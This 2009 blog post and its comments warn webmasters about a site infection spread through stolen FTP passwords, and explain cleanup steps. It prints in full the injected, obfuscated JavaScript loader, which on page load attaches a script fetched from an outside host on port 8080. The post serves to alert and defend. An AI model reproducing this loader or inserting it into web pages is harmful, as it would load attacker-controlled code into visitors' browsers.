Site virus

By , December 11, 2009 2:39 PM

Has your site been hacked?

Have you seen this at the bottom of your web page code?

bald chicken

bald chicken

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement(‘script’);H3qqea3ur6p.setAttribute(‘type’, ‘text/javascript’);H3qqea3ur6p.setAttribute(‘id’, ‘myscript1’);H3qqea3ur6p.setAttribute(‘src’,  ‘h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^’.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ”));H3qqea3ur6p.setAttribute(‘defer’, ‘defer’);document.body.appendChild(H3qqea3ur6p);}} catch(e) {}

This is caused by a virus that infects your computer commonly via bit torrent files downloaded that have a virus hidden in them.

Then this virus scans you computer for any FTP programs that you may have installed,

and steals the passwords for your FTP sites.

Then an automated program connects to your FTP site, and adds the above to any.

1) Html

2) java script filers

3) php files

4) possibly asp files

so they all need to be scanned for the following

I recommend using a program called Search and Replace http://www.funduc.com/search_replace.htm

this will fix all your programs in one hit.

The of course chage all your passwords of your FTP sites,

and get rid of the virus if you can find it

3 Responses to “Site virus”

  1. Konstantin says:

    I also faced with this virus and wrote a script for cleaning the infected files. You should just place it into the web root and make sure that the script has enough permissions for updating files. Please feel free to download the script at

    http://justcoded.com/wp-content/uploads/2009/12/curevir.php.txt

    Btw, you are not completely correct about virus behaviour. It doesn’t infect any PHP/HTML/ASP file, only specific files which contain words “index”, “default”, “main”, maybe something else

  2. admin says:

    Well thanks for that
    it certainly affects js files
    so beware to remove it from them also

  3. Konstantin says:

    Yes, I just meant that not ALL of the PHP/HTML/ASP files are infected. JS files are infected completely though

Leave a Reply

Thomas Challenger Thomas Challenger